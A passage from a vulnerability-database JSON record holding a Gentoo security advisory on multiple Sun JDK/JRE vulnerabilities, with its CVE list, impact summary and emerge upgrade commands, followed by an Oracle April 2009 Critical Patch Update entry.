"2016-09-06T19:46:04", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2009-1095", "CVE-2009-1093", "CVE-2009-1104", "CVE-2008-5346", "CVE-2008-3105", "CVE-2009-3880", "CVE-2009-1096", "CVE-2009-2670", "CVE-2009-2476", "CVE-2008-5339", "CVE-2009-1099", "CVE-2009-2716", "CVE-2009-1097", "CVE-2009-3728", "CVE-2009-2689", "CVE-2008-3103", "CVE-2009-2690", "CVE-2008-5341", "CVE-2009-2723", "CVE-2009-2718", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2009-2409", "CVE-2009-2722", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-3115", "CVE-2008-5358", "CVE-2009-2720", "CVE-2008-3112", "CVE-2008-3104", "CVE-2008-3106", "CVE-2009-2673", "CVE-2009-1100", "CVE-2009-3883", "CVE-2008-5342", "CVE-2009-3876", "CVE-2008-3111", "CVE-2008-5353", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-1098", "CVE-2008-3108", "CVE-2009-1094", "CVE-2009-3729", "CVE-2009-3879", "CVE-2009-3881", "CVE-2008-3113", "CVE-2008-3110", "CVE-2009-2674", "CVE-2008-3114", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-1106", "CVE-2008-5350", "CVE-2009-3869", "CVE-2009-1103", "CVE-2008-3109", "CVE-2008-5345", "CVE-2008-5347", "CVE-2009-2724", "CVE-2009-3874", "CVE-2008-5354", "CVE-2008-3107", "CVE-2009-1101", "CVE-2009-3886", "CVE-2009-3871", "CVE-2009-2475", "CVE-2009-3865", "CVE-2009-1107", "CVE-2009-2671", "CVE-2009-3877", "CVE-2009-1102", "CVE-2008-5351", "CVE-2009-2672", "CVE-2009-2719", "CVE-2009-3884", "CVE-2009-3868", "CVE-2009-2676", "CVE-2009-1105", "CVE-2009-2721", "CVE-2009-2675"], "description": "### Background\n\nThe Sun Java Development Kit (JDK) and the Sun Java Runtime Environment (JRE) provide the Sun Java platform. \n\n### Description\n\nMultiple vulnerabilities have been reported in the Sun Java implementation. Please review the CVE identifiers referenced below and the associated Sun Alerts for details. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted JAR archive, applet, or Java Web Start application, possibly resulting in the execution of arbitrary code with the privileges of the user running the application. Furthermore, a remote attacker could cause a Denial of Service affecting multiple services via several vectors, disclose information and memory contents, write or execute local files, conduct session hijacking attacks via GIFAR files, steal cookies, bypass the same-origin policy, load untrusted JAR files, establish network connections to arbitrary hosts and posts via several vectors, modify the list of supported graphics configurations, bypass HMAC-based authentication systems, escalate privileges via several vectors and cause applet code to be executed with older, possibly vulnerable versions of the JRE. \n\nNOTE: Some vulnerabilities require a trusted environment, user interaction, a DNS Man-in-the-Middle or Cross-Site-Scripting attack. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Sun JRE 1.5.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/sun-jre-bin-1.5.0.22\"\n\nAll Sun JRE 1.6.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/sun-jre-bin-1.6.0.17\"\n\nAll Sun JDK 1.5.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/sun-jdk-1.5.0.22\"\n\nAll Sun JDK 1.6.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/sun-jdk-1.6.0.17\"\n\nAll users of the precompiled 32bit Sun JRE 1.5.x should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-emulation/emul-linux-x86-java-1.5.0.22\"\n\nAll users of the precompiled 32bit Sun JRE 1.6.x should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-emulation/emul-linux-x86-java-1.6.0.17\"\n\nAll Sun JRE 1.4.x, Sun JDK 1.4.x, Blackdown JRE, Blackdown JDK and precompiled 32bit Sun JRE 1.4.x users are strongly advised to unmerge Java 1.4: \n \n \n # emerge --unmerge =app-emulation/emul-linux-x86-java-1.4*\n # emerge --unmerge =dev-java/sun-jre-bin-1.4*\n # emerge --unmerge =dev-java/sun-jdk-1.4*\n # emerge --unmerge dev-java/blackdown-jdk\n # emerge --unmerge dev-java/blackdown-jre\n\nGentoo is ceasing support for the 1.4 generation of the Sun Java Platform in accordance with upstream. All 1.4 JRE and JDK versions are masked and will be removed shortly.", "edition": 1, "modified": "2009-11-17T00:00:00", "published": "2009-11-17T00:00:00", "id": "GLSA-200911-02", "href": "https://security.gentoo.org/glsa/200911-02", "type": "gentoo", "title": "Sun JDK/JRE: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2019-05-29T18:20:49", "bulletinFamily": "software", "cvelist": ["CVE-2009-0996", "CVE-2009-1004", "CVE-2009-0995", "CVE-2009-0992", "CVE-2009-1010", "CVE-2009-0999", "CVE-2009-0978", "CVE-2009-0981", "CVE-2009-1003", "CVE-2009-0997", "CVE-2008-5359", "CVE-2008-5349", "CVE-2009-1016", "CVE-2009-0983", "CVE-2008-5352", "CVE-2009-0986", "CVE-2008-5348", "CVE-2009-0977", "CVE-2008-5357", "CVE-2008-5360", "CVE-2009-1013", "CVE-2008-5356", "CVE-2008-5358", "CVE-2009-0982", "CVE-2009-1006", "CVE-2009-0989", "CVE-2009-1017", "CVE-2009-0984", "CVE-2009-0991", "CVE-2009-1011", "CVE-2009-0998", "CVE-2008-5353", "CVE-2009-0988", "CVE-2009-1000", "CVE-2009-1014", "CVE-2009-0976", "CVE-2008-5350", "CVE-2009-0993", "CVE-2009-1002", "CVE-2009-1012", "CVE-2008-5345", "CVE-2009-1005", "CVE-2008-5347", "CVE-2008-5354", "CVE-2009-0979", "CVE-2009-0994", "CVE-2009-1001", "CVE-2009-0975", "CVE-2009-1009", "CVE-2009-0985", "CVE-2009-0980", "CVE-2009-0973", "CVE-2009-0990", "CVE-2008-5351", "CVE-2009-1008", "CVE-2009-0974", "CVE-2009-0972"], "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible.** This Critical Patch Update contains 43 new security fixes across all products.\n", "modified": "2009-09-03T00:00:00", "published": "2009-04-14T00:00:00", "id": "ORACLE:CPUAPR2009-099563", "href": "", "type": "oracle", "title": "cpuapr2009.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}